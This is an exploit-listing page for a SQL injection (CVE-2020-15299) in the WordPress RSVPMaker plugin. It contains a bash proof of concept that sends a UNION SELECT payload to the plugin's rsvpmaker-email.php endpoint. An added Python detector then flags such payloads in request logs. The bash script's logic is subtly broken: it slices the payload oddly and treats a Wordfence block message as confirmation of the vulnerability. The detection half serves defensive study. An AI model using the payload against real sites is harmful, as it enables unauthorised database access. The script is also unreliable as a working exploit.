WordPress RSVPMaker 9.3.2 SQL Injection

CVE: CVE-2020-15299
Category: CWE-89
Price: $1,000
Severity: High
Author: Exploit Alert
Risk: High
Exploitation Type: Remote
Date: 2024-01-17
CVSS: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2024010058

Below is a copy:

WordPress RSVPMaker 9.3.2 SQL Injection
#!/bin/bash

# Set the URL of the website running the vulnerable plugin
url="http://example.com/wp-content/plugins/rsvpmaker/rsvpmaker-email.php"

# Set the number of columns in the query
columns=5

response=$(curl -s "$url")
query=$(echo "$response" | grep -oP 'FROM .* WHERE .*')

payload="' UNION SELECT 1,2,3,4,5-- "

# Test the query with different numbers of columns
for i in $(seq 1 $columns)
do
  query_with_payload="${query%?*}?${payload:0:i}${query#*?}"
  curl -s -X POST -d "$query_with_payload" "$url" | grep -q "Wordfence Security Error"
  if [ $? -eq 0 ]
  then
    echo "Vulnerability confirmed with $i columns"
    break
  fi
done
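From a defender's side, the useful thing to take from the proof-of-concept above is the request shape it produces: a UNION SELECT payload delivered to the plugin's rsvpmaker-email.php endpoint. The following is an added detection example written for this page, not code from the advisory or from the RSVPMaker project. It inspects decoded query strings and POST bodies for UNION-based injection markers and rates hits against the plugin path higher than hits elsewhere; the sample requests, the path filter and the severity labels are all constructed assumptions for illustration.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample requests modelled on the PoC: the PoC posts a
# UNION SELECT payload to rsvpmaker-email.php. These are invented for
# illustration, not captured traffic.
SAMPLE_REQUESTS = [
    {"method": "POST", "path": "/wp-content/plugins/rsvpmaker/rsvpmaker-email.php",
     "body": "id=5' UNION SELECT 1,2,3,4,5-- "},
    {"method": "GET", "path": "/wp-content/plugins/rsvpmaker/rsvpmaker-email.php",
     "query": "id=5"},
    {"method": "POST", "path": "/wp-login.php", "body": "log=admin&pwd=secret"},
    {"method": "GET", "path": "/", "query": "s=union+select+1%2C2%2C3--"},
]

# Hypothetical path filter: requests to the plugin endpoint named in the
# advisory are rated "high"; the same payload elsewhere is rated "medium".
RSVPMAKER_PATH = re.compile(r"/wp-content/plugins/rsvpmaker/", re.I)

# UNION ... [ALL] ... SELECT with whitespace or inline comments (/**/) as
# separators, which is how the keyword pair is commonly obfuscated.
UNION_SELECT = re.compile(
    r"union(?:\s|/\*.*?\*/)+(?:all(?:\s|/\*.*?\*/)+)?select", re.I | re.S)


def decode(value):
    """Percent-decode repeatedly so double-encoded payloads are matched too."""
    prev = None
    while prev != value:
        prev, value = value, unquote_plus(value)
    return value


def classify(req):
    """Return 'high', 'medium' or None for one request dict."""
    text = " ".join(decode(req.get(k, "")) for k in ("query", "body"))
    if not UNION_SELECT.search(text):
        return None
    return "high" if RSVPMAKER_PATH.search(req["path"]) else "medium"


def scan(requests):
    """Return (method, path, severity) for every request that matches."""
    hits = []
    for r in requests:
        sev = classify(r)
        if sev:
            hits.append((r["method"], r["path"], sev))
    return hits


if __name__ == "__main__":
    for method, path, sev in scan(SAMPLE_REQUESTS):
        print(f"{sev:6} {method} {path}")
```

The decode step matters: a WAF or log parser that matches only on the raw, still-encoded string will miss a payload sent as `union+select` or `%55NION`. Matching on the plugin path rather than on a specific parameter name keeps the rule useful even though the advisory does not say which parameter is injected.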

Copyright ©2024 Exploitalert.
